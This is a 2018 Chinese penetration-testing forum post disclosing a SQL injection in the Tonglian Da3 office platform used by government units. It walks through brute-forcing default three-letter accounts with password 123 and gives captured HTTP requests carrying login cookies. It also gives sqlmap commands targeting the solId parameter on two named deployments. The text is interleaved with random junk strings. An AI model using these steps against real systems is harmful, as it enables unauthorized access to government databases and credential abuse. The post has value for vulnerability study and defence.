中国网络渗透测试联盟

标题: 同联Da3协同办公平台前台通用sql injection漏洞 [打印本页]

作者: admin    时间: 2018-10-20 20:15
标题: 同联Da3协同办公平台前台通用sql injection漏洞

: j) r" p: l0 J" h, K) f3 `, q4 O
3 F0 v8 V# K8 b, g$ O3 H1 a& `4 ]

, p* `/ D" O. V' U% q# {

4 ?! Z) R) j4 y' L 平台简介: 9 D, r& y; c. T p6 Z4 H# [+ x

8 C" P, l* v; C" C

6 C9 `6 J! |: f! x5 k: M" E' {  " h1 g( s }( q+ W- y6 S9 L

" _0 c- V6 X, n

7 R. ?% G$ R& i 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
" X/ v' u; c, T! }8 e同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
( K, K* G) L; m; V同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!0 s% D9 U) j) ^# ^4 f3 f5 b3 d

( x9 h+ l5 x* {: |

2 o) E( A( \: a" e8 ]1 X4 |   / c# S+ w- {1 j

$ b3 O2 H5 H, p( ?" E4 B$ F

% ~7 ` f( q9 G; z6 `, i$ _8 v; [$ B 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址: 3 x+ O& j. k; u% G

4 M+ Y/ Q2 Y1 C1 c7 u3 w. G

0 u9 g2 @. f! F; y  ( u% w7 I( _2 B( o5 n) b t

3 g+ Q5 w. T% T1 _, B& U

9 K) J* U' @! d8 C1 M7 F http://1.1.1.1:7197/cap-aco/#(案例2-) 8 Z: F/ }/ y& R3 R& G4 f

! N. @. f( \& ~" P

5 d5 q `. N$ D) ?2 C, h http://www.XXOO.com (案例1-官网网站) " t2 g5 n* r+ g" b, R+ I1 n, G+ C

: A/ w5 m& N1 p: \% X& Q! V- @

5 n7 Q, l8 ?& w3 M4 D- R8 G2 A  * C. d+ l# H/ {; B# B2 | F+ q

1 \' A6 d( {! z2 ?1 F$ r

r' @- M+ X/ U3 R: _* C/ F4 W 漏洞详情:) I* l3 ^$ C9 g- m; \; s0 }

0 F# M& w, Q2 e

% j0 D- U- D+ F+ M' |* W  初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试7 Q6 y4 ?& r+ ^3 K! R. E

1 a9 t1 J# e8 G4 `& a6 t; f

7 e8 {' i3 ?% l% s% @9 z/ _      首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:( W) i5 H" `2 I6 W( q

- H0 f/ o8 B; m1 F' n2 K

3 }' G& B2 f3 a- r P) v7 V9 u   8 ~# t- R. c, e- b, c4 D

! N. \; }# h% w" s' w5 t

) j/ s* S& |0 e3 a y  8 D9 Y0 ~! @% A: h2 `% J% u& K

' X: d& \0 k1 q! Y5 o* o

) L: J" G7 H3 h" H8 f4 {4 D status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下: ; [' n, z) {( \- g a/ u+ q

$ b m3 D+ F& e- {% K2 B% P

3 {5 J4 |( P4 U* @7 [$ d" W) @! n 1、案例1-官方网站 N/ Q! R+ i" p& c {) j& M

8 f& ?/ R% f/ s; Q

; g8 a; W# Y. }) J GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1) m$ v3 N# B8 k7 ~( q! ]( U {1 ]. G

# L# `" K5 q+ [- I

' ~" x N1 i( y6 s Host: www.XXOO.com : N: T0 z6 `3 J' C2 O

/ Z3 `' j% i, N* v" z+ @5 F$ l# s

w- E6 [# i+ ^# ~* K; {$ W- X Proxy-Connection: Keep-Alive4 D& }3 k0 A+ L. i7 U: {

0 {+ @5 F5 X( u7 ]5 U: `

B9 G$ E: M- O& w; X* J7 ] Accept: application/json, text/javascript, */*; q=0.017 L/ |7 X- ^) `& m$ I9 ]

' T* D; s; \" X' s: I

, B# M" p. j9 i+ o Accept-Language: zh-CN. {* r; N3 {5 e6 T# c

* m. J8 _+ r& s

4 H4 q. t6 L) _: R4 X4 D Content-Type: application/json! a5 N% Z+ g% c3 O( u9 H# u9 c G

" |! p/ g4 T8 m( `3 s

6 {/ `0 O! ?" [# C1 u% G User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko & ^6 L/ `7 i% m! n# T. Y

; q' _1 r' M, [* N; ]3 [

5 P) W/ m2 ?) `! {0 _ X-Requested-With: XMLHttpRequest 2 K& T- f' b% ~8 B {# s

( n1 G. |7 Q' y W

' d4 G6 i. J0 P" J6 Y ~" _) h8 U Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002 . B; p/ Q+ `, j3 }- y* q

@* S- h7 ]$ T0 ?

( D& s+ b a' E8 V7 _ Accept-Encoding: gzip, deflate, sdch . g3 {7 e1 |, `- C

- `" f" ~+ m) T4 b3 Q

$ G5 d$ u1 T/ h- }7 A) [+ Y Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e- M6 b! }9 r) I$ r5 L' z3 \

4 |3 C" a+ |9 l# B% R! M% r

5 w' G. F: X" Z" T 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:* O7 r: w9 q; F# P+ E

1 d6 ~6 N7 Q6 {8 c+ q) p

4 J p; F* Z5 \4 A3 {" p   " o4 h; O6 C2 P: G4 ^

7 z- \( m h$ {$ q% c0 m) L

( v" z$ F7 [. z. p' b   9 s6 a9 U( |& A

5 E0 C# \6 Q4 A( Y

4 y+ e! _" w/ r7 _; }" \- p* i  - K& \: ~ X- Z3 T5 L

" X5 Y6 h9 T' w) S, ^& S8 W q

" w5 _; B( {8 H& u! E, f% `  . _6 y( g; g$ I; s8 r ?) Y

( m& ~+ g/ }2 q& J+ }

) W8 P0 r5 ~& H# A6 D, l- t  ' f, N) O8 Z+ j$ j

& [- v# I: u0 D/ n0 q1 d

* D. n0 ^, o- a2 ?# X 2、案例2-某天河云平台 ) o. P6 V$ Y8 w6 G. A% V

5 }( S: y/ t: E) s

6 }' G8 L& B) e( @6 y GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1" _) [0 F6 z& f+ m8 U/ d

5 c, Q& {/ d. ~9 a. w9 K

9 \+ ]1 O( F# N Host: 1.1.1.:7197% C/ {6 o8 n* y9 [6 K" D

9 g5 _5 S# E0 U6 _

n4 w' i4 P2 P% C f) S. c Accept: application/json, text/javascript, */*; q=0.01! [9 n% f6 K0 n& |# {3 N$ k. J

: B- L4 Z0 c5 N: w0 W. R; _

) z) g3 y- Q) q$ J; H( X0 o X-Requested-With: XMLHttpRequest ; f, [% Y2 @: [ y1 O

9 K6 V! z2 G9 Y7 \6 ?( ^

5 e2 @6 ^$ g, p; W& P User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0 2 k& x f% A4 X+ I- o

9 P7 H. M% Y1 s9 H# T' R

. ^+ Z+ M- s- M# m' U( p1 R1 u Content-Type: application/json 5 f) ], E; A# i, ?8 H! @7 |3 c' C

; j0 H/ D/ N3 l9 | y& |7 E

) G; Y; ?& g d/ _8 D* H* q Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008 * j! c' E+ N' Y( p0 L

4 |0 Y3 \6 A7 Q" D3 t# `

3 k" ^1 u2 ^9 P+ a Accept-Language: zh-CN,zh;q=0.82 k3 ]4 G/ C0 \$ r0 f( |1 [

0 N2 D& a! d+ z& t( f5 t

0 j& ]9 @. @2 P- @ \+ O% A Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1 % |' Y: P; B$ ~% Z

% U! q* K" M8 } Y

F: u0 X' b& M0 { Connection: close+ k1 }+ ~/ b9 l- D) T

, K' h$ P$ `; ^. z( s o3 G) y! i

- b, e$ M) {6 g, @. a% p. c! _ 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图: 0 d6 |$ }: `1 {& j

' L9 o% d4 y6 \( o

% j* @( Y8 f' `) R. B* e/ v! O, h   5 l! }0 O/ ^0 {9 ` Z

6 U* c1 N( W6 ~( ?+ L" l# D

* @9 d' O3 O7 @. e4 k0 P
( h9 e, V# x# b2 k7 l* c4 E9 w






欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2